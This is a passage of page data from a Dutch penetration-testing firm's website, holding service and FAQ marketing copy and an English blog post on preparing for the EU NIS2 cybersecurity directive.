Detailhandel","summary":"Op maat gemaakte beveiligingsoplossingen ontwikkeld om detailhandelsbedrijven te verdedigen tegen cyberdreigingen, waarbij de bescherming van klantgegevens, financiële transacties en operationele integriteit wordt gewaarborgd."}],"other services":[{"title":"Web Application VAPT","href":"/diensten/web-applicatie-pentest"},{"title":"Infrastructure VAPT","href":"/diensten/infrastructuur-pentest"},{"title":"Mobile App VAPT","href":"/diensten/mobiele-applicatie-pentest"},{"title":"Cloud Service VAPT","href":"/diensten/cloud-beveiliging"},{"title":"ICS/SCADA VAPT","href":"/diensten/ics-scada-pentest"},{"title":"IoT VAPT","href":"/diensten/iot-pentest"},{"title":"WiFi VAPT","href":"/diensten/wifi-pentest"},{"title":"CoronaCheck VAPT","href":"/diensten/coronacheck-app-pentest"}],"see all services":"Bekijk Alle Diensten","services title":"Diensten geleverd door WebSec","other services title":"Andere diensten van WebSec","service cards":[{"name":"Pentests","summary":"Penetratietest-diensten omvatten het uitvoeren van gesimuleerde cyberaanvallen op een systeem of netwerk om kwetsbaarheden te identificeren en beveiligingsmaatregelen te beoordelen, waardoor organisaties hun verdediging tegen echte dreigingen kunnen versterken.","href":"/diensten/pentest","icon":"/assets/services/Pentesting.png"},{"name":"Beveiligings abonnementen","summary":"Beveiligingsabonnementen bieden een reeks pakketten die zowel offensieve als defensieve beveiligingsoplossingen omvatten, waarbij een uitgebreide beveiliging tegen een eerlijke prijs wordt gewaarborgd voor bedrijven van elke omvang.","href":"/diensten/security-abonnementen","icon":"/assets/services/Security Subscriptions.png"},{"name":"Beveiligingspersoneel","summary":"Staffing Services bieden de perfecte oplossing om uw team aan te vullen met bekwame beveiligingsprofessionals, waardoor een robuuste verdediging tegen cyberdreigingen wordt gewaarborgd en de operationele efficiëntie wordt verbeterd.","href":"/diensten/security-abonnementen","icon":"/assets/services/Security Subscriptions.png"}],"cutting-edge":"Vooruitstrevende","approach":"Benadering","approach summary":"Ervaar ongekende beveiliging met onze baanbrekende aanpak in 8 stappen. Onze geavanceerde technieken en innovatieve oplossingen bieden ongeëvenaarde bescherming tegen opkomende bedreigingen en kwetsbaarheden, waardoor de beveiliging naar nieuwe hoogten wordt getild. Revolutioneer uw beveiligingsmaatregelen met ons.","approaches":[{"title":"Kwaliteit","websec":{"subtitle":"Op Maat Gemaakte Oplossingen","summary":"Elke oplossing die we bieden is nauwkeurig op maat gemaakt voor de unieke behoeften van elke klant, waarbij de hoogste kwaliteit en beste pasvorm voor optimale resultaten wordt gewaarborgd."},"industryAverage":{"subtitle":"Standaardoplossingen","summary":"Veel bedrijven in onze branche bieden voorgepakte oplossingen die mogelijk niet volledig voldoen aan de unieke behoeften van elke klant, wat de algehele kwaliteit kan aantasten."}},{"title":"Innovatie","websec":{"subtitle":"Toekomstgericht","summary":"We investeren voortdurend in nieuwe technologieën en methodologieën om voorop te blijven lopen, waarbij we geavanceerde beveiligingsoplossingen leveren aan onze klanten."},"industryAverage":{"subtitle":"Traditionele Methoden","summary":"De industrie vertrouwt vaak op gevestigde, traditionele methodologieën die soms niet in staat zijn om opkomende beveiligingsbedreigingen te anticiperen en aan te pakken."}},{"title":"Communicatie","websec":{"subtitle":"Transparant en Responsief","summary":"Wij geven prioriteit aan duidelijke, tijdige communicatie, waarbij we onze klanten gedurende onze samenwerking geïnformeerd en betrokken houden."},"industryAverage":{"subtitle":"Periodieke Updates","summary":"De industriestandaard omvat vaak het verstrekken van updates op vaste intervallen, wat klanten mogelijk ongeïnformeerd laat over ontwikkelingen in realtime."}},{"title":"Expertise","websec":{"subtitle":"Ervaren Specialisten","summary":"Ons team bestaat uit ervaren cybersecurityspecialisten, die consequent worden bijgewerkt met de nieuwste trends en bedreigingen om eersteklas beveiligingsoplossingen te bieden."},"industryAverage":{"subtitle":"Algemene IT-Praktijkmensen","summary":"Veel bedrijven hebben een team van algemene IT-praktijkmensen die, hoewel capabel, mogelijk niet de diepgaande kennis hebben die nodig is om genuanceerde beveiligingsproblemen aan te pakken."}},{"title":"Duurzaamheid","websec":{"subtitle":"Duurzame Operaties","summary":"Wij implementeren milieuvriendelijke praktijken in onze hele bedrijfsvoering, waarbij we het belang van duurzaam ondernemen in de huidige wereld begrijpen."},"industryAverage":{"subtitle":"Beperkte Inspanningen voor Duurzaamheid","summary":"Hoewel de industrie geleidelijk duurzaamheid omarmt, hebben veel bedrijven nog niet volledig groene praktijken in hun operaties geïntegreerd."}},{"title":"Nazorg","websec":{"subtitle":"Proactieve Ondersteuning","summary":"Onze klantondersteuning eindigt niet na implementatie. We bieden voortdurende hulp om optimale prestaties te garanderen en eventuele problemen snel aan te pakken."},"industryAverage":{"subtitle":"Reactieve Ondersteuning","summary":"De industriestandaard omvat vaak reactieve ondersteuning, waarbij hulp voornamelijk wordt geboden wanneer problemen zich voordoen, in plaats van proactief optimale prestaties te garanderen."}}],"faqs":[{"q":"Wie is WebSec?","a":"WebSec is een organisatie met een missie en visie die volledig gericht is op IT-beveiliging. WebSec is specialist op het gebied van offensieve beveiliging. WebSec heeft specialisten in dienst die zeer geavanceerd zijn op het gebied van penetratietesten, code review en beveiligingsbewustzijn."},{"q":"Wat doet WebSec?","a":"WebSec heeft ethische hackers (ook wel IT-beveiligingsconsultants, penetratietesters of pentesters genoemd). We zetten deze collega's in bij klanten om fouten en beveiligingsproblemen in hun informatiesystemen, netwerken, applicaties en servers op te sporen, om zo hun beveiliging te optimaliseren. Deze professionals kennen de werkwijze en denkwijze van een hacker, deze kennis wordt gebruikt door onze beveiligingsexperts om een veilige IT-omgeving voor onze klanten te waarborgen."},{"q":"Waar is WebSec gevestigd?","a":"\u003cp\u003eWe zijn momenteel geregistreerd op Keurenplein 41, UNIT A6260, 1069 CD Amsterdam, Nederland.\u003cbr\u003eOns United States adres is 1021 E Lincolnway Suite #6400, Cheyenne, Wyoming 82001\u003c/p\u003e\n"},{"q":"Wanneer is WebSec opgericht?","a":"De handelsnaam WebSec bestaat al vier jaar, eerder geregistreerd bij de Kamer van Koophandel onder de naam 'OS.SI Consulting B.V.' Sinds 3 augustus 2020 is WebSec een onafhankelijk beveiligingsbedrijf geworden onder een moederbedrijf 'WebSec Holding B.V.'"},{"q":"Waarom kiezen voor WebSec?","a":"\u003cp\u003eOmdat WebSec flexibiliteit, diversiteit, transparantie, snelheid en professionaliteit kan bieden voor de beste kwaliteit tegen onverslaanbare tarieven.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eDivers:\u003c/strong\u003e Wij zijn momenteel de enige IT-beveiligingsorganisatie in Nederland die een alles-in-één beveiligingsoplossing abonnement kan bieden, bijvoorbeeld: onze klanten met een beveiligingsabonnement kunnen in januari een beveiligingsbeoordeling (pentest) doen en in februari een phishing-campagne zonder extra kosten.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFlexibel:\u003c/strong\u003e Aangezien het minimale contract één jaar is, kunnen we deze professionele beveiligingsprojecten tegen een lagere prijs uitvoeren voor een vast bedrag per maand.\u003cbr\u003eOok als onze klanten met een beveiligingsabonnement niet zeker weten welke maandelijkse dienst ze nodig hebben, hebben ze de mogelijkheid om het aantal uren naar de volgende maand over te dragen, waardoor ruimte ontstaat voor grotere opdrachten.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eProfessioneel:\u003c/strong\u003e In tegenstelling tot onze concurrenten kunnen wij de hoogst mogelijke kwaliteit van werk bieden, zonder onze klanten te veel te belasten of onze kwaliteitsnormen in gevaar te brengen.\u003cbr\u003eDaarom garanderen wij klanttevredenheid en de beveiliging \u0026amp; bescherming van de IT-omgevingen van onze klanten het hele jaar door tegen de nieuwste bekende en onbekende cyberdreigingen.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eWendbaar:\u003c/strong\u003e WebSec heeft geen wachttijden, WebSec kan een opdracht onmiddellijk starten na het bespreken van een startdatum en het ondertekenen van het benodigde juridische papierwerk.\u003cbr\u003eBij WebSec bestaan er geen wachttijden of extra kosten voor spoedbestellingen.\u003cbr\u003eWebSec is 24/7 telefonisch bereikbaar voor onze klanten en we zijn klaar om in te grijpen in geval van beveiligingsincidenten, niet alleen binnen de EU maar bijna overal ter wereld.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eTransparantie:\u003c/strong\u003e Bij WebSec vinden we communicatie met onze klanten erg belangrijk, we streven ernaar om altijd de meest professionele ervaring te bieden.\u003cbr\u003eOp deze manier houden we altijd nauwlettend in de gaten hoe, wat en wanneer en houden we onze klanten op de hoogte van elk evenement.\u003cbr\u003eOnze kernwaarden zijn Integriteit, Vertrouwelijkheid en Beschikbaarheid. Daarom blijven onze klanten nooit in het duister, maar staan ze altijd in onze schijnwerpers.\u003c/p\u003e\n"}],"secured by websec":"Beveiligd door WebSec","testimonials":"Getuigenissen","whats new":"Nieuws","have questions":"Veel Gestelde Vragen","industry average":"Industriegemiddelde"}},"__N_SSP":true,"pageProps":{"posts":[{"id":"6697b739fa7f20b3ca2b8de0","updatedAt":"2024-09-16T07:45:45.057Z","createdAt":"2024-07-17T12:21:13.074Z","title":"How to Prepare for the EU NIS2 Directive","body":"\u003cp\u003e\u003c/p\u003e\u003cimg alt=\"nis2_banner.png\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2F1f300b2d-aa67-4a67-8209-0382eec0e3e8%2Fnis2_banner.png?alt=media\u0026amp;token=aad719a3-1bc6-4973-b2a2-d4ab8fb1f48a\"\u003e\u003cp\u003e\u003cbr\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eCyberattacks are growing at an alarming rate. Because of this, companies of all sizes are suffering from embarrassing reputational damages and huge financial losses. The NIS2 (Network and Information Systems Directive 2) is the European Union’s (EU) latest response to this disturbing trend.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eIf you’re unsure how to prepare for the NIS2 directive, we’ll cover the specific steps to achieve compliance. We’ll also discuss the sectors included and possible penalties for non-compliance so you can rest assured you're not breaking any laws or being exposed to attacks.\u003c/span\u003e\u003c/p\u003e\u003ch2\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eWhat is the NIS2 Directive?\u003c/strong\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eThe Network and Information Systems Directive 2 (NIS2) is a legislation issued by the European Union (EU) to improve the cybersecurity of network and information systems in the region. The directive was \u003cstrong\u003eissued on January 16 2023\u003c/strong\u003e, and countries in the EU must transpose it into national law by \u003cstrong\u003eOctober 17, 2024\u003c/strong\u003e.\u003c/span\u003e\u003c/p\u003e\u003ch2\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eWhy is NIS2 Important?\u003c/strong\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAccording to PwC’s 2024 \u003c/span\u003e\u003ca href=\"https://www.pwc.com/dti\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003eGlobal Digital Trust Insights\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e survey, the percentage of businesses that have experienced data breaches costing over $1M has increased from 27% to 36% YoY. This indicates that despite existing measures (case in point, the NIS1), progress in improving security isn’t encouraging. Hence, the need for better and more stringent directives.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAlthough NIS1, the first piece of EU cybersecurity legislation, increased the ability of member states to fight cybersecurity, its implementation was still difficult. There were quite a few shortcomings that made it complex and confusing for targeted organizations to comply. This caused fragmentation at different levels, and NIS2 had to be drafted.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eTherefore, the goal of the NIS2 directive is to:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eStrengthen existing security requirements.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eEnhance supply chain security.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eStreamline reporting procedures and\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eIntroduce more rigorous supervisory measures and penalties, including standardized sanctions across the EU.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eUltimately, this expansion of the NIS scope through the second directive will cover more sectors and entities, ensuring they take the proper measures to increase cybersecurity in Europe in the long run.\u003c/span\u003e\u003c/p\u003e\u003ch2\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eDifferences Between NIS1 and NIS2\u003c/strong\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eBased on the goals above, here are the fundamental changes from NIS1 to NIS2:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eBroader Scope\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eNIS2 covers a broader range of entities or sectors than its predecessor, NIS1. This includes both \u003cstrong\u003eessential \u003c/strong\u003eand \u003cstrong\u003eimportant\u003c/strong\u003e entities. Essential entities provide critical services to the public, while important entities play a key role in the economy or society. In total, this broadened scope is estimated to cover over 160,000 organizations across the EU.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eIt's important to mention that NIS2 will apply to any organization previously covered in the NIS1 directive, plus any organization with over 50 employees and an annual revenue that exceeds €10 million.\u003c/span\u003e\u003c/p\u003e\u003col start=\"2\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eThorough Security Obligations\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eThe confusion in NIS1 usually came down to vague requirements and inconsistencies. Thankfully, NIS2 will address that with \u003cstrong\u003emore specific security obligations\u003c/strong\u003e that will cover critical areas like risk management, incident detection and response, and cybersecurity training and awareness.\u003c/span\u003e\u003c/p\u003e\u003col start=\"3\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eIncident Reporting\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eNIS2 requires organizations to \u003cstrong\u003ereport cybersecurity incidents\u003c/strong\u003e to the authorities, which increases accountability. This enhanced reporting will help authorities better monitor cyber threats and coordinate responses to major attacks.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eUnder new guidelines, there will be two phases to incident reporting in NIS2. Affected companies must report the incident \u003cstrong\u003ewithin 24 hours after awareness\u003c/strong\u003e. Then, another final report \u003cstrong\u003enot more than one month\u003c/strong\u003e later.\u003c/span\u003e\u003c/p\u003e\u003col start=\"4\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eEnforcement through Penalties\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eThe EU is pulling no punches when it comes to NIS2 enforcement, with severe penalties for those who fall short. For example, \u003cstrong\u003eEssential Entities \u003c/strong\u003eface maximum fines of \u003cstrong\u003e€10 million\u003c/strong\u003e or \u003cstrong\u003e2%\u003c/strong\u003e of their global annual revenue (whichever is higher). \u003cstrong\u003eImportant Entities \u003c/strong\u003earen’t so far behind and could be fined up to \u003cstrong\u003e€7 million \u003c/strong\u003eor \u003cstrong\u003e1.4%\u003c/strong\u003e of global annual turnover.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eInterestingly, these penalties are in addition to any fines levied under GDPR for related incidents! Moreover, the EU has established a \u003c/span\u003e\u003ca href=\"https://cybersecurity-centre.europa.eu/index_en\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003eEuropean Cybersecurity Competence Centre\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e to coordinate efforts.\u003c/span\u003e\u003c/p\u003e\u003ch2\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eHow to Prepare for NIS2 and Achieve Compliance\u003c/strong\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eNow that you understand what’s at stake and the importance of this new directive, let’s discuss how to prepare for NIS2.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eHere are the key measures to prepare as stated in the \u003c/span\u003e\u003ca href=\"https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:32022L2555\u0026amp;qid=1706711760658#d1e3312-80-1\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003eNIS2 Directive\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eSecure system acquisition and development: \u003c/strong\u003eThe security of your organization’s systems, applications, and infrastructure is crucial throughout their lifecycle. You must adopt rigorous security measures from development through deployment and disposal, such as having guidelines in place for secure coding and change management practices.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eRisk management and information system security: \u003c/strong\u003eTo comply with NIS2, ensure you create thorough risk management practices. This includes developing and regularly updating policies to identify, assess, and mitigate IT system vulnerabilities. To stay ahead of evolving threats and technological changes, remember to conduct ongoing policy reviews and adjustments.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eIncident Handling and Disclosure policies: Y\u003c/strong\u003eou need a foolproof \u003c/span\u003e\u003ca href=\"https://websec.nl/en/services/incident-response\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003eincident response\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e and disclosure plan to help minimize damages from security incidents and speed up recovery. These plans should outline organization-wide procedures for detecting, reporting, analyzing, and mitigating incidents to ensure swift recovery and compliance with regulatory requirements.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eBusiness continuity policies: \u003c/strong\u003eAs you draft your incident handling policies, make sure to have plans for backups, disaster recovery, and managing crises. This ensures that even during disruptions, business continues to run as usual.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eSupply chain security and monitoring: \u003c/strong\u003eDid you know that about 98% of organizations are affiliated with a third party that has previously experienced a breach? To add salt to injury, third-party attacks make up nearly \u003c/span\u003e\u003ca href=\"https://www.securitymagazine.com/articles/100447-third-party-attack-vectors-are-responsible-for-29-of-breaches\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003e30% of breaches\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e. That's why, to prepare for NIS2, you must ensure you have secure relationships with service providers and suppliers. Always audit your suppliers’ security practices periodically to ensure they’re keeping things safe on their end.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eAsset management: \u003c/strong\u003eThat is, you must know all your organization’s crucial assets and keep them secure. Always maintain a comprehensive inventory of critical assets, including their classification and ownership.\u003cstrong\u003e\u0026nbsp;\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eCyber hygiene policies and cybersecurity training: \u003c/strong\u003eYour employees are the first line of defence against cyber threats. We cannot overemphasize just how important it is to teach good cybersecurity habits to protect the organization’s assets. Conduct ongoing security awareness training to foster a security-conscious culture and keep everyone updated on the latest threats.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eCryptography and encryption: \u003c/strong\u003eThis means developing and enforcing policies for using encryption to safeguard sensitive data and communications. Also, ensure these policies outline encryption standards, encryption key management practices, and procedures for keeping data secure.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eHuman resources (HR) security: \u003c/strong\u003eFor your HR security, develop and implement access control policies. This means that only authorized people can access critical systems and information. In addition, conduct regular background checks and screen employees.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eMulti-factor Authentication: \u003c/strong\u003eUse multi-factor authentication (MFA) to enhance security by requiring multiple forms of verification to confirm user identities and prevent unauthorized access.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eWhen you read through the NIS2 directive, one thing is clear: \u003cstrong\u003etop management can and will be held responsible for non-compliance. \u003c/strong\u003eTheir roles have gone beyond just being informed about cybersecurity to taking action and being held accountable.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eTherefore, executives must ensure their organizations adhere to all themes, monitor the implementation of these security measures, and oversee supply chain and incident reporting.\u003c/span\u003e\u003c/p\u003e\u003ch2\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eAction Plans for Achieving NIS2 Compliance\u003c/strong\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eLet’s go over specific actions that will help you achieve NIS2 compliance.\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eBenchmark Security Best Practices\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAn excellent foundational starting point is benchmarking existing security frameworks. Remember that NIS2 builds on NIS1. So, while the new directive makes cybersecurity stronger, it doesn’t essentially throw everything in the previous legislation away. This also means that existing best practice standards like the \u003c/span\u003e\u003ca href=\"https://websec.nl/en/services/iso-27001-pentest\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003eISO 27001\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e and NIST CSF remain relevant. That’s why you should look at them for detailed controls and how to build on them.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eBy aligning your security efforts with these frameworks, you can capitalize on existing controls and processes, accelerating your journey to NIS2 compliance.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003col start=\"2\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eConduct Thorough Risk Assessment\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eEvery cybersecurity strategy needs a deep risk assessment, and achieving NIS2 compliance is no different. This process should involve:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eIdentifying critical assets\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eEvaluating potential threats\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAssessing the potential impact of incidents\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eDon’t forget to always monitor your risk posture to address evolving threats and vulnerabilities.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003col start=\"3\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eBuild an Information Security Management System (ISMS) Using Best Practices\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003ePutting an ISMS in place provides a structured approach to cybersecurity by gathering security-related elements into a single source of truth. This helps you understand your current security posture and also monitor your security actions.\u003c/span\u003e\u003c/p\u003e\u003col start=\"4\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eDevelop and Enforce an Incident Response Plan\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eIncident handling is a key part of NIS2 compliance. The core parts of your incident response plan should include incident detection, response procedures, communication plan, and post-incident analysis and review.\u003c/span\u003e\u003c/p\u003e\u003col start=\"5\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eStrengthen Supply Chain Security\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eYou could do everything right in your security approach and still be undone by external factors like vendors. Here's how to \u003cem\u003ereally \u003c/em\u003estrengthen your supply chain security:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eContinuously assess vendor risk and require that they adhere to your security standards.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAlways include cybersecurity requirements in all Service Level Agreements (SLAs) with suppliers and partners. This ensures everyone knows their security obligation and is accountable for it.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAlways monitor and audit supply chain security best practices to identify and quickly address potential weaknesses.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003col start=\"6\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 